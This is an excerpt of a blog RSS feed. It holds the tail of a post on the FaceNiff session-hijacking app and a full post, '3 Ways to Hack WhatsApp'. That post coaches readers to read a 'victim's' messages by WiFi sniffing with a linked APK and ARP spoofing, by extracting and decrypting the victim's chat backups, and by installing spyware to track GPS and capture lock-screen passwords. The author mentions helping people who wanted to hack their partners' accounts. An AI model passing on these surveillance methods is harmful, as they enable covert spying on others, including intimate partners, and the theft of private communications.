&lt;a href="http://rightyaleft.com/wp-content/uploads/2011/09/icon_256.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img alt="" class="alignleft size-full wp-image-814" src="http://rightyaleft.com/wp-content/uploads/2011/09/icon_256.png" height="125" title="icon_256" width="125" /&gt;&lt;/a&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;b&gt;FaceNiff&lt;/b&gt;&amp;nbsp;is an&amp;nbsp;&lt;b&gt;Android&lt;/b&gt;&amp;nbsp;app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.&lt;br /&gt;It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (&lt;b&gt;Open/WEP/WPA-PSK/WPA2-PSK&lt;/b&gt;).&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;You need to watch a Video in order to know how to use this App-&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;To know the list of Models in which this app has been&amp;nbsp;successfully&amp;nbsp;worked please click here-&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div dir="ltr" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;b&gt;&lt;a href="http://faceniff.freeforums.org/supported-devices-rom-list-t10.html" target="_blank"&gt;&lt;/a&gt;&lt;a href="http://faceniff.freeforums.org/supported-devices-rom-list-t10.html" target="_blank"&gt;Confirmed to work&lt;/a&gt;.&lt;/b&gt;&lt;/span&gt;  &lt;br /&gt;
&lt;h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;How to Protect Yourself&lt;/span&gt;&lt;div id="bpslidein_place_holder"&gt;
&lt;/div&gt;
&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Now I am going to tell you the method in which you can&amp;nbsp;protect&amp;nbsp;your account from being hacked.&lt;/span&gt; &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;You need to do following steps in order to protect your account-&lt;/span&gt; &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;1. Go to &lt;b&gt;Account&lt;/b&gt; -&amp;gt; &lt;b&gt;Account Setting&lt;/b&gt;.&lt;/span&gt; &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;2.&amp;nbsp;Select the&amp;nbsp;&lt;b&gt;Security&lt;/b&gt;&amp;nbsp;tab from the account settings page in the left hand side.&lt;/span&gt; &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;3.&amp;nbsp;On the&amp;nbsp;&lt;b&gt;Secure browsing &lt;/b&gt;section, select the &lt;b&gt;Edit&lt;/b&gt;&amp;nbsp;Button.&lt;/span&gt; &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;4.&amp;nbsp;Check the box that tells&amp;nbsp;&lt;b&gt;Browse facebook on a secured connection (https) when possible&lt;/b&gt;&amp;nbsp;and select&amp;nbsp;&lt;b&gt;save changes.&lt;/b&gt;&lt;/span&gt;  &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Thats it. Now your account is safe from the hackers, and it in impossible to hack your account from any hacker.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>3 Ways to Hack WhatsApp</title><link>http://bambahacks.blogspot.com/2013/11/3-ways-to-hack-whatsapp.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 15 Nov 2013 09:20:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-5878005693718923715</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; margin: 0px; padding: 0px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLZvXonwSW7DGtR_5tM5dsrQkXOx3oNpJdo7lYiE7N8Ljge4j8uz38TIBgyFDCWonqMX3twuK_ackvLOdcfmMfir8NtJQcW8PWjMxNwSRWsLgssehiIoUf9Ber00G-UgF38wuFKpMt-Dg/s1600/WhatsApp-400x255+copy.bmp" imageanchor="1" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;"&gt;&lt;img alt="Hack Whatsapp" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLZvXonwSW7DGtR_5tM5dsrQkXOx3oNpJdo7lYiE7N8Ljge4j8uz38TIBgyFDCWonqMX3twuK_ackvLOdcfmMfir8NtJQcW8PWjMxNwSRWsLgssehiIoUf9Ber00G-UgF38wuFKpMt-Dg/s320/WhatsApp-400x255+copy.bmp" height="204" style="border: none; margin: 0px; max-width: 100%; padding: 0px; position: relative;" title="Hack Whatsapp" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; margin: 0px; padding: 0px; text-align: center;"&gt;
&lt;/div&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Seeing a keep interest of hacking WhatsApp of my visitors on "&lt;/span&gt;&lt;br /&gt;
&lt;h4 style="font-family: 'Bree Serif', serif; font-size: 28px; font-weight: normal; line-height: 36px; margin: 10px 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;b&gt;&lt;a href="http://goh4x.blogspot.in/2012/12/4-whatsapp-tricks-and-hacks-android.html"&gt;4 whatsapp trick and hack[android]&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;" Promoted me to indulge my contribution to this topic. After lot of Researching I came upon with 3 Whatsapp Hacks which Really Works, and in this article i will also clear some misconception on WhatsApp Hacking.&lt;/span&gt;&lt;br /&gt;
&lt;a href="https://www.blogger.com/blogger.g?blogID=4670434626441035720" name="more" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px; outline: none; padding: 0px; transition: all 0.25s linear 0s;"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h4 style="font-family: 'Bree Serif', serif; font-size: 28px; font-weight: normal; line-height: 36px; margin: 10px 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;h4 style="font-family: 'Bree Serif', serif; font-size: 28px; font-weight: normal; line-height: 36px; margin: 10px 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;b&gt;Let's Get Started&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h2 style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 4px; font-family: 'Bree Serif', serif; font-size: 36px; font-weight: normal; line-height: 44px; margin: 10px 0px; padding: 0px 0px 5px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;1. WhatsApp Sniffer&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;WhatsAppSniffer is a tool for root&amp;nbsp;&lt;/span&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;terminals&lt;/span&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;to read WhatsApp conversations of a WIFI network (Open, WEP, WPA/WPA2). It captures the conversations, pictures / videos and&amp;nbsp;&lt;/span&gt;coordinates&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;&lt;/span&gt;that are&lt;span style="margin: 0px; padding: 0px;"&gt;sent or&amp;nbsp;&lt;/span&gt;received&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;by an Android phone, iPhone or Nokia on the same WIFI network. It has not been tested with W indows Phone&amp;nbsp;&lt;/span&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;terminals&lt;/span&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;. It can't read the messages written or&amp;nbsp;&lt;/span&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;received&lt;/span&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;by the BlackBerry's, as they use&amp;nbsp;&lt;/span&gt;their own&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;servers and not WhatsApp's.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;This application&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;is designed to demonstrate that the security of WhatsApp's&amp;nbsp;&lt;/span&gt;communications&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;is null. WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp's servers. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: "While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp .... ")&lt;/span&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional).&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; margin: 0px; padding: 0px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdJJk-SYhbKhBx4R6pLrqOwt3zLga4wfZpy5b2EgZ8El-9MY-Glb0kTYY60nZ4nT8CS81nX32ac1b1I8Sr1i4XYiVHXh69vsa7ssdWZtBImdtiSHXUnL2nwQUInJ6Ajale0aZrEpEmBiY/s1600/a.jpg" imageanchor="1" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdJJk-SYhbKhBx4R6pLrqOwt3zLga4wfZpy5b2EgZ8El-9MY-Glb0kTYY60nZ4nT8CS81nX32ac1b1I8Sr1i4XYiVHXh69vsa7ssdWZtBImdtiSHXUnL2nwQUInJ6Ajale0aZrEpEmBiY/s320/a.jpg" height="320" style="border: none; margin: 0px; max-width: 100%; padding: 0px; position: relative;" width="191" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4 style="font-family: 'Bree Serif', serif; font-size: 28px; font-weight: normal; line-height: 36px; margin: 10px 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Requirements&lt;/span&gt;&lt;/h4&gt;
&lt;ol style="margin: 0px 0px 0px 35px; padding: 10px 0px 20px;"&gt;
&lt;li style="list-style-type: decimal; margin: 0px; padding: 0px 0px 5px;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;A&amp;nbsp;&lt;a href="http://en.wikipedia.org/wiki/Android_rooting"&gt;Rooted Android Device&lt;/a&gt;&lt;/span&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li style="list-style-type: decimal; margin: 0px; padding: 0px 0px 5px;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Your Victim Should Use Same Wi-Fi Through Which you are connected.&lt;/span&gt;&lt;/li&gt;
&lt;li style="list-style-type: decimal; margin: 0px; padding: 0px 0px 5px;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="list-style-type: decimal; margin: 0px; padding: 0px 0px 5px;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;a href="https://www.dropbox.com/s/007var5gl52apnn/WhatsAppSniffer%20Donate%20%E2%98%85%20root%20v1.03%20~%20Go!%20H4X.apk" rel="nofollow" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;" target="_blank"&gt;&lt;/a&gt;&lt;a href="https://www.dropbox.com/s/007var5gl52apnn/WhatsAppSniffer%20Donate%20%E2%98%85%20root%20v1.03%20~%20Go!%20H4X.apk" target="_blank"&gt;WhatsAppSniffer Donate ★ root v1.03&lt;/a&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;This Trick is much similar to&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: Trebuchet MS, sans-serif;"&gt;&lt;a href="http://goh4x.blogspot.in/2012/09/how-to-hack-friends-facebook-account.html" target="_blank"&gt;Hack your Friend's Facebook Account &lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ol style="margin: 0px 0px 0px 35px; padding: 10px 0px 20px;"&gt;&lt;/ol&gt;
&lt;h2 style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 4px; font-family: 'Bree Serif', serif; font-size: 36px; font-weight: normal; line-height: 44px; margin: 10px 0px; padding: 0px 0px 5px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;2. Decrypting Conversations&lt;/span&gt;&lt;/h2&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;have your victim locked his whatsapp? or you want all his conversation on your PC. Generally for security reasons WhatsApp encrypt Conversation while taking backup in SD Card or Phone Memory.But i have found a tool on XDA that claims to decrypt all the whatsapp conversation down to your PC.&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;If you have some access over his device you can also send files from Bluetooth to your device and later read all the conversations.&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;This tool is called&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;&lt;a href="http://forum.xda-developers.com/showthread.php?t=1583021" rel="nofollow" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;" target="_blank"&gt;&lt;/a&gt;&lt;a href="http://forum.xda-developers.com/showthread.php?t=1583021" target="_blank"&gt;WhatsApp Xtract&lt;/a&gt;&amp;nbsp;and for this all credits goes to&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;&lt;a href="http://forum.xda-developers.com/member.php?u=3594618" target="_blank"&gt; ztedd&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Some general advice on how to backup Whatsapp and get the database file:&lt;/span&gt;&lt;/div&gt;
&lt;h4 style="font-family: 'Bree Serif', serif; font-size: 28px; font-weight: normal; line-height: 36px; margin: 10px 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Android&lt;/span&gt;&lt;/h4&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;- In Whatsapp go to settings - more - Backup Chats&lt;br /&gt;- Copy the folder "Whatsapp" on the SD card to your backup location (e.g., PC)&lt;br /&gt;- (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder "TitaniumBackup" on the SD card to your backup location (e.g., PC)&lt;br /&gt;- Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files "wa.db" and "msgstore.db" you will find inside the Titanium Backup archive "com.whatsapp-[Date]-[some digits].tar.gz", alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.&lt;/span&gt;&lt;/div&gt;
&lt;h4 style="font-family: 'Bree Serif', serif; font-size: 28px; font-weight: normal; line-height: 36px; margin: 10px 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;iPhone&lt;/span&gt;&lt;/h4&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;- use Itunes to create an&amp;nbsp;&lt;i&gt;unencrypted&lt;/i&gt;&amp;nbsp;Backup&lt;br /&gt;- use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can't handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.)&lt;/span&gt;&lt;/div&gt;
&lt;h4 style="font-family: 'Bree Serif', serif; font-size: 28px; font-weight: normal; line-height: 36px; margin: 10px 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Blackberry&lt;/span&gt;&lt;/h4&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;- sync your blackberry with desktop manager and then copy the messagestore.db file from SD&lt;br /&gt;- however, it seems that this file is encrypted? Currently we don't know how to get the unencrypted messagestore.db file&lt;br /&gt;- Blackberry not supported yet!&lt;/span&gt;&lt;/div&gt;
&lt;h4 style="font-family: 'Bree Serif', serif; font-size: 28px; font-weight: normal; line-height: 36px; margin: 10px 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Nokia&lt;/span&gt;&lt;/h4&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&amp;nbsp;- not known yet&lt;br /&gt;- Nokia not supported yet!&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;For Further Detail about this Method you can move to&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;a href="http://forum.xda-developers.com/showthread.php?t=1583021" rel="nofollow" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;" target="_blank"&gt;&lt;/a&gt;&lt;a href="http://forum.xda-developers.com/showthread.php?t=1583021" target="_blank"&gt;this Forum of XDA&lt;/a&gt;.&lt;br /&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="margin: 0px; padding: 0px;"&gt;
&lt;h2 style="background-color: white; border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 4px; color: #333333; font-family: 'Bree Serif', serif; font-size: 36px; font-weight: normal; line-height: 44px; margin: 10px 0px; padding: 0px 0px 5px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;3. Using Spywares&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Open Sans', 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 25px; margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Using 3rd Party Spywares can be very useful for spying not only WhatsApp Conversation but also many things like, you can able to Track GPS Location, you can capture the lock screen passwords and they can be also used for monitoring Websites. there are many spywares in the market but i recommend is&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Open Sans', 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 25px; margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;a href="http://www.bosspy.com/" target="_blank"&gt;BOSSPY&lt;/a&gt;. Because it's free :)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;or you can Spy configuring&amp;nbsp;&lt;a href="https://play.google.com/store/apps/details?id=com.jrummy.busybox.installer&amp;amp;feature=search_result#?t=W251bGwsMSwxLDEsImNvbS5qcnVtbXkuYnVzeWJveC5pbnN0YWxsZXIiXQ.." rel="nofollow" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;" target="_blank"&gt;BusyBox&lt;/a&gt;&amp;nbsp;and Steps to do that are&amp;nbsp;&lt;a href="http://gizmostorm.com/how-to-spy-on-someone-else-whatsapp-account-from-your-android/" rel="nofollow" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;" target="_blank"&gt;here&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Open Sans', 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 25px; margin: 0px; padding: 0px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h2 style="background-color: white; border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 4px; color: #333333; font-family: 'Bree Serif', serif; font-size: 36px; font-weight: normal; line-height: 44px; margin: 10px 0px; padding: 0px 0px 5px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Some Misconceptions about WhatsApp hacking&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Open Sans', 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 25px; margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;after writing&lt;/span&gt;&amp;nbsp;"&lt;a href="http://goh4x.blogspot.in/2012/12/4-whatsapp-tricks-and-hacks-android.html" rel="nofollow" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;"&gt;4 WhatsApp Tricks and Hacks [Android&lt;/a&gt;&lt;a href="http://goh4x.blogspot.in/2012/12/4-whatsapp-tricks-and-hacks-android.html" rel="nofollow" style="-webkit-transition: all 0.25s linear 0s; color: #32a4d6; margin: 0px; outline: none; padding: 0px; text-decoration: none; transition: all 0.25s linear 0s;"&gt;]&lt;/a&gt;" I have received a number of E-Mail Most of them were asking for help for hacking their partner's WhatsApp and I have replied them all. but lots of people were having misconceptions about whatsapp hacking so let me discuss over here.&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Open Sans', 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 25px; margin: 0px; padding: 0px;"&gt;
&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ol style="background-color: white; color: #333333; font-family: 'Open Sans', 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: 14px; line-height: 25px; margin: 0px 0px 0px 35px; padding: 10px 0px 20px;"&gt;
&lt;li style="list-style-type: decimal; margin: 0px; padding: 0px 0px 5px;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;Hacking WhatsApp is Much Harder than Hacking Facebook and Twitter as Facebook and Twitter can be Hacked using Social Engeenering Techniques like Phising and many others when we compare to hack someones WhatsApp Account and Gain Full Access over his Account - It is nearly Impossible.&lt;/span&gt;&lt;/li&gt;
&lt;li style="list-style-type: decimal; margin: 0px; padding: 0px 0px 5px;"&gt;&lt;span style="font-family: 'Trebuchet MS', sans-serif; margin: 0px; padding: 0px;"&gt;There is no tool that can hack whatsapp and give you a full access over someone's whatsapp account. Yes, there are Lot's of Youtube Video's ,Websites Filled with "WhatsApp Hack Tool" which claim that they can but the reality is they can't.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLZvXonwSW7DGtR_5tM5dsrQkXOx3oNpJdo7lYiE7N8Ljge4j8uz38TIBgyFDCWonqMX3twuK_ackvLOdcfmMfir8NtJQcW8PWjMxNwSRWsLgssehiIoUf9Ber00G-UgF38wuFKpMt-Dg/s72-c/WhatsApp-400x255+copy.bmp" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="-1" type="application/json" url="https://www.dropbox.com/s/007var5gl52apnn/WhatsAppSniffer%20Donate%20%E2%98%85%20root%20v1.03%20~%20Go!%20H4X.apk"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>Seeing a keep interest of hacking WhatsApp of my visitors on " 4 whatsapp trick and hack[android] " Promoted me to indulge my contribution to this topic. After lot of Researching I came upon with 3 Whatsapp Hacks which Really Works, and in this article i will also clear some misconception on WhatsApp Hacking. &amp;nbsp; Let's Get Started&amp;nbsp; 1. WhatsApp Sniffer&amp;nbsp; WhatsAppSniffer is a tool for root&amp;nbsp;terminals&amp;nbsp;to read WhatsApp conversations of a WIFI network (Open, WEP, WPA/WPA2). It captures the conversations, pictures / videos and&amp;nbsp;coordinates&amp;nbsp;that aresent or&amp;nbsp;received&amp;nbsp;by an Android phone, iPhone or Nokia on the same WIFI network. It has not been tested with W indows Phone&amp;nbsp;terminals. It can't read the messages written or&amp;nbsp;received&amp;nbsp;by the BlackBerry's, as they use&amp;nbsp;their own&amp;nbsp;servers and not WhatsApp's. This application&amp;nbsp;is designed to demonstrate that the security of WhatsApp's&amp;nbsp;communications&amp;nbsp;is null. WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp's servers. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: "While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp .... ")&amp;nbsp; For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional). &amp;nbsp;Requirements A&amp;nbsp;Rooted Android Device. Your Victim Should Use Same Wi-Fi Through Which you are connected. WhatsAppSniffer Donate ★ root v1.03. This Trick is much similar to&amp;nbsp; Hack your Friend's Facebook Account 